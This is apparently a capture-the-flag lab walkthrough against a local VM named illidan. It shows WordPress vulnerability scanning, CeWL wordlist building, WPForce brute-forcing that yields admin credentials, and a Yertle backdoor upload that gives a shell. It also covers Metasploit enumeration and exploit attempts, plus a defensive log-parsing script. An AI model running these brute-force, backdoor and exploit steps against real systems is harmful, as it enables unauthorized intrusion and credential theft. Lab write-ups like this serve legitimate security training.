 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.6.14
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.56.103/wp-content/themes/twentyfourteen/
 
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.

[+] Elapsed time: 00:00:10
root@kali:~# 




WPForce

I download the tool from:
https://github.com/n00py/WPForce
You may need to install some Python modules: pip install requests
Careful with this tool (DoS): without -t 1 it knocked my server over.
python wpforce.py -i wp.txt -w pw.txt -u http://192.168.56.103 -t 1 -d

em50l@jejo.es$ python wpforce.py -i wp.txt -w pw.txt -u http://192.168.56.103 -t 1 -d
       ,-~~-.___.       __        __ ____   _____
      / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
     (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
      \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
         ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
        /  \-'~;   ||     |                v.1.0.0
       /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
     =(  _____||________|                 ~n00py~
    
Username List: wp.txt (579)
Password List: pw.txt (2)
URL: http://192.168.56.103
Trying: http://192.168.56.103/xmlrpc.php
http://192.168.56.103/xmlrpc.php found!
Now the brute force will begin!  >:)
Here is the content of the wordlists for each thread
Thread 0
['eUSk4l_99%', '']
-----------------------------------------------------
[Thread 0]Trying chef : eUSk4l_99%
[Thread 0]Trying gazpacho : eUSk4l_99%
[Thread 0]Trying pan : eUSk4l_99%
[Thread 0]Trying batidora : eUSk4l_99%
[Thread 0]Trying Sean : eUSk4l_99%
--------------------------
[Sean : eUSk4l_99%] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
[Thread 0]Trying site : eUSk4l_99%
[Thread 0]Trying rico : eUSk4l_99%
100% Percent Complete
All correct pairs:
{'Sean': 'eUSk4l_99%', 'sean': 'eUSk4l_99%'}

Yertle

I download the tool from the same repository:
https://github.com/n00py/WPForce
You may need to install some Python modules: pip install requests
python yertle.py -u sean -p "eUSk4l_99%" -t http://192.168.56.103

em50l@jejo.es$ pip install requests
em50l@jejo.es$ python yertle.py -u sean -p "eUSk4l_99%" -t http://192.168.56.103
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress
                     v.1.1.0
    
Backdoor uploaded!
Upload Directory: caiqwwg

os-shell> uname -a
Sent command: uname -a
Linux illidan 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:51:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

os-shell> 





First contact with the Metasploit Framework console.

root@kali:~# msfconsole 
                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .
       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > 

It is a REPL-style interface; Tab completion lists the available commands.


I type use aux<Tab> sca<Tab> ht<Tab> w<Tab> to list the WordPress modules under auxiliary/scanner/http/wordpress_*.

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > use auxiliary/scanner/http/wordpress_<Tab key>

use auxiliary/scanner/http/wordpress_content_injection  use auxiliary/scanner/http/wordpress_multicall_creds
use auxiliary/scanner/http/wordpress_cp_calendar_sqli   use auxiliary/scanner/http/wordpress_pingback_access
use auxiliary/scanner/http/wordpress_ghost_scanner      use auxiliary/scanner/http/wordpress_scanner
use auxiliary/scanner/http/wordpress_login_enum         use auxiliary/scanner/http/wordpress_xmlrpc_login

I type use auxiliary/scanner/http/wordpress_xmlrpc_login to load one specific module.

msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) >

I type sh<Tab> act<Tab> to get the show actions command

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show actions 

Auxiliary actions:
   Name  Description

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 

I type info to get the module's information

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > info

       Name: Wordpress XML-RPC Username/Password Login Scanner
     Module: auxiliary/scanner/http/wordpress_xmlrpc_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Cenk Kalpakoglu <cenk.kalpakoglu@gmail.com>

Description:
  This module attempts to authenticate against a Wordpress-site (via 
  XMLRPC) using username and password combinations indicated by the 
  USER_FILE, PASS_FILE, and USERPASS_FILE options.

References:
  https://wordpress.org/
  http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/
  https://cvedetails.com/cve/CVE-1999-0502/

I type show options to see the module's options.

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > show options
Module options (auxiliary/scanner/http/wordpress_xmlrpc_login):
   Name              Current Setting  Required  Description
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   TARGETURI         /                yes       The base path to the wordpress application
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

I configure the module.

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set targeturi /
targeturi => /
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set rhosts 192.168.56.103
rhosts => 192.168.56.103
msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run

[*] 192.168.56.103:80    :/xmlrpc.php - Sending Hello...
[+] 192.168.56.103:80 - XMLRPC enabled, Hello message received!
[*] Starting XML-RPC login sweep...
[*] Error: 192.168.56.103: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::WordpressRPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

It looks like I am finally getting somewhere: XML-RPC is enabled. The sweep itself aborts with "Cred details can't be blank" because none of the credential options (USERNAME, USER_FILE, PASS_FILE or USERPASS_FILE) were set.

Build a dictionary from the words on a website

root@kali:~# cewl http://192.168.56.103 > wp.txt 
root@kali:~# head wp.txt 
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
WordPress
que
Everybody
want
chef
para
gazpacho
pan
entry
Testing modules from the Metasploit Framework console.

1) I set the rhosts variable to 192.168.56.103 globally, so I do not have to set it in every module.

setg rhosts 192.168.56.103

msf5 > set -g rhosts 192.168.56.103
rhosts => 192.168.56.103
msf5 > 

wordpress_login_enum

msf5 > use auxiliary/scanner/http/wordpress_login_enum 
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.56.103
msf5 auxiliary(scanner/http/wordpress_login_enum) > set user_file wp.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set verbose false
msf5 auxiliary(scanner/http/wordpress_login_enum) > run

[*] / - WordPress Version 4.6.6 detected
[*] / - WordPress User-Validation - Checking Username:'CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)'
[*] / - WordPress User-Validation - Checking Username:'WordPress'
[*] / - WordPress User-Validation - Checking Username:'que'
[*] / - WordPress User-Validation - Checking Username:'Everybody'
[*] / - WordPress User-Validation - Checking Username:'want'
[*] / - WordPress User-Validation - Checking Username:'chef'
[*] / - WordPress User-Validation - Checking Username:'para'
[*] / - WordPress User-Validation - Checking Username:'gazpacho'
...
...
...
[*] / - WordPress User-Validation - Checking Username:'Sean'
[+] / - WordPress User-Validation - Username: 'Sean' - is VALID
[*] / - WordPress User-Validation - Checking Username:'sean'
[+] / - WordPress User-Validation - Username: 'sean' - is VALID
[*] / - WordPress User-Validation - Checking Username:'mezcla'
[*] / - WordPress User-Validation - Checking Username:'cocinitas'
[+] / - WordPress User-Validation - Username: 'cocinitas' - is VALID
[*] / - WordPress User-Validation - Checking Username:'cocinitas'
[+] / - WordPress User-Validation - Username: 'cocinitas' - is VALID
[*] / - WordPress User-Validation - Checking Username:'with'
...
...
...
[+] / - WordPress User-Validation - Found 3 valid users
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

vsftpd_234_backdoor

msf5 > use  exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.56.103:21 - Banner: 220 (vsFTPd 2.3.5)
[*] 192.168.56.103:21 - USER: 530 This FTP server is anonymous only.
[-] 192.168.56.103:21 - This server is configured for anonymous only and the backdoor code cannot be reached
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > info

       Name: VSFTPD v2.3.4 Backdoor Command Execution

http_version

msf5 > use auxiliary/scanner/http/http_version 
msf5 auxiliary(scanner/http/http_version) > run

[+] 192.168.56.103:80 Apache/2.2.22 (Ubuntu) ( Powered by PHP/5.3.10-1ubuntu3.26 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Note: this can be found faster with curl -vs 192.168.56.103 2>&1 | grep -i server (curl writes the response headers to stderr, so they must be redirected before grep sees them).


http/dir_scanner

msf5 > use auxiliary/scanner/http/dir_scanner 
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.56.103
[+] Found http://192.168.56.103:80/cgi-bin/ 403 (192.168.56.103)
[+] Found http://192.168.56.103:80/doc/ 403 (192.168.56.103)
[+] Found http://192.168.56.103:80/icons/ 403 (192.168.56.103)
[+] Found http://192.168.56.103:80/wp-includes/ 200 (192.168.56.103)
[+] Found http://192.168.56.103:80/wp-login/ 200 (192.168.56.103)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

http/brute_dirs

msf5 > use auxiliary/scanner/http/brute_dirs 
msf5 auxiliary(scanner/http/brute_dirs) > show options 

Module options (auxiliary/scanner/http/brute_dirs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FORMAT   a,aa,aaa         yes       The expected directory format (a alpha, d digit, A upperalpha)
   PATH     /                yes       The path to identify directories
   RHOSTS   192.168.56.103   yes       The target address range or CIDR identifier

msf5 auxiliary(scanner/http/brute_dirs) > run

[*] Using code '404' as not found.
[+] Found http://192.168.56.103:80/doc/ 403
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
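From the defender's side, the xmlrpc_login / wordpress_login_enum sweeps and the dir_scanner / brute_dirs runs above leave a distinctive trail in the Apache access log. The following is an added example (not part of the original write-up): a small parser that flags clients with bursts of POSTs to the WordPress login endpoints or bursts of 404s. The log lines and the thresholds are constructed assumptions.

```python
# Added example (not from the write-up): spot the traffic that the
# wordpress_xmlrpc_login / wordpress_login_enum sweeps and dir_scanner /
# brute_dirs runs leave in an Apache access log. Sample lines (combined
# format) and thresholds are constructed assumptions, not real captures.
import re
from collections import Counter, defaultdict

SAMPLE_LOG = """\
192.168.56.101 - - [23/Jun/2019:13:40:01 +0200] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:40:01 +0200] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:40:02 +0200] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:40:02 +0200] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:41:10 +0200] "GET /aaa/ HTTP/1.1" 404 286 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:41:10 +0200] "GET /aab/ HTTP/1.1" 404 286 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:41:10 +0200] "GET /aac/ HTTP/1.1" 404 286 "-" "Mozilla/5.0"
192.168.56.101 - - [23/Jun/2019:13:41:11 +0200] "GET /doc/ HTTP/1.1" 403 290 "-" "Mozilla/5.0"
192.168.56.1 - - [23/Jun/2019:13:42:05 +0200] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

LOGIN_ENDPOINTS = {"/xmlrpc.php", "/wp-login.php"}

def parse(log_text):
    """Yield (ip, method, path-without-query, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # skip malformed lines instead of crashing on them
            yield m["ip"], m["method"], m["path"].split("?")[0], int(m["status"])

def find_scanners(log_text, login_threshold=3, notfound_threshold=3):
    """Return {ip: [reasons]} for clients whose request mix looks like a sweep."""
    login_posts, not_found = Counter(), Counter()
    for ip, method, path, status in parse(log_text):
        if method == "POST" and path in LOGIN_ENDPOINTS:
            login_posts[ip] += 1   # xmlrpc_login / login_enum hammer these
        if status == 404:
            not_found[ip] += 1     # dir_scanner / brute_dirs leave 404 trails
    findings = defaultdict(list)
    for ip, n in login_posts.items():
        if n >= login_threshold:
            findings[ip].append(f"{n} POSTs to WordPress login endpoints")
    for ip, n in not_found.items():
        if n >= notfound_threshold:
            findings[ip].append(f"{n} 404s (directory brute-force pattern)")
    return dict(findings)

if __name__ == "__main__":
    for ip, reasons in find_scanners(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```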


smb_version

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.56.103:445    - Host could not be identified: Unix (Samba 3.6.3)
[*] 192.168.56.103:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > 

smb_enumusers

msf5 > use auxiliary/scanner/smb/smb_enumusers
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.56.103:139    - ILLIDAN [ nobody, sean ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.103:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

I obtain a username: sean.


smb_lookupsid

msf5 > use auxiliary/scanner/smb/smb_lookupsid 
msf5 auxiliary(scanner/smb/smb_lookupsid) > run

[*] 192.168.56.103:139    - PIPE(LSARPC) LOCAL(ILLIDAN - 5-21-3811150221-2098953256-551513859) DOMAIN(WORKGROUP - )
[*] 192.168.56.103:139    - USER=nobody RID=501
[*] 192.168.56.103:139    - GROUP=None RID=513
[*] 192.168.56.103:139    - USER=sean RID=1000
[*] 192.168.56.103:139    - ILLIDAN [nobody, sean ]
[*] 192.168.56.103:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

ms08_067_netapi

msf5 > use exploit/windows/smb/ms08_067_netapi 
msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.56.101:80 
[*] 192.168.56.103:445 - Automatically detecting the target...
[*] 192.168.56.103:445 - Fingerprint: Unknown -  - lang:Unknown
[-] 192.168.56.103:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
A pity; when this one works you get a remote meterpreter> prompt.

ssh_version

msf5 > use auxiliary/scanner/ssh/ssh_version 
msf5 auxiliary(scanner/ssh/ssh_version) > run

[+] 192.168.56.103:22     - SSH server version: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4 ( service.version=5.9p1 openssh.comment=Debian-5ubuntu1.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=12.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:12.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.56.103:22     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

udp_sweep

msf5 > use auxiliary/scanner/discovery/udp_sweep 
msf5 auxiliary(scanner/discovery/udp_sweep) > run

[*] Sending 13 probes to 192.168.56.103->192.168.56.103 (1 hosts)
[*] Discovered NetBIOS on 192.168.56.103:137 (ILLIDAN:<00>:U :ILLIDAN:<03>:U :ILLIDAN:<20>:U :__MSBROWSE__:<01>:G :WORKGROUP:<1d>:U :WORKGROUP:<1e>:G :WORKGROUP:<00>:G :00:00:00:00:00:00)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

ssh_enumusers

msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file usuarios
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.56.103
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.56.103:22 - SSH - Using malformed packet technique
[*] 192.168.56.103:22 - SSH - Starting scan
[-] 192.168.56.103:22 - SSH - User 'cocinitas' not found
[+] 192.168.56.103:22 - SSH - User 'sean' found
[+] 192.168.56.103:22 - SSH - User 'root' found
[-] 192.168.56.103:22 - SSH - User 'illidan' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I see that the users sean and root exist on the machine for SSH access.
Note: SSH user enumeration does not always work.

If I use a dictionary:

msf5 auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set -g rhosts 192.168.56.107
rhosts => 192.168.56.107
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/unix_users.txt
user_file => /usr/share/wordlists/metasploit/unix_users.txt
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.56.107:22 - SSH - Using malformed packet technique
[*] 192.168.56.107:22 - SSH - Starting scan
[-] 192.168.56.107:22 - SSH - User '4Dgifts' not found
.....
.....

[+] 192.168.56.107:22 - SSH - User 'backup' found
[+] 192.168.56.107:22 - SSH - User 'bin' found
[+] 192.168.56.107:22 - SSH - User 'daemon' found
[+] 192.168.56.107:22 - SSH - User 'ftp' found
[+] 192.168.56.107:22 - SSH - User 'games' found
[+] 192.168.56.107:22 - SSH - User 'gnats' found
[+] 192.168.56.107:22 - SSH - User 'irc' found
[+] 192.168.56.107:22 - SSH - User 'list' found
[+] 192.168.56.107:22 - SSH - User 'lp' found
[+] 192.168.56.107:22 - SSH - User 'mail' found
[+] 192.168.56.107:22 - SSH - User 'man' found
[+] 192.168.56.107:22 - SSH - User 'messagebus' found
[+] 192.168.56.107:22 - SSH - User 'news' found
[+] 192.168.56.107:22 - SSH - User 'nobody' found
[+] 192.168.56.107:22 - SSH - User 'proxy' found
[+] 192.168.56.107:22 - SSH - User 'root' found
[+] 192.168.56.107:22 - SSH - User 'sshd' found
[+] 192.168.56.107:22 - SSH - User 'sync' found
[+] 192.168.56.107:22 - SSH - User 'sys' found
[+] 192.168.56.107:22 - SSH - User 'syslog' found
[+] 192.168.56.107:22 - SSH - User 'uucp' found
[+] 192.168.56.107:22 - SSH - User 'www-data' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > 

https://fwhibbit.es/euskalhack-iv-pentesting4ever-illidan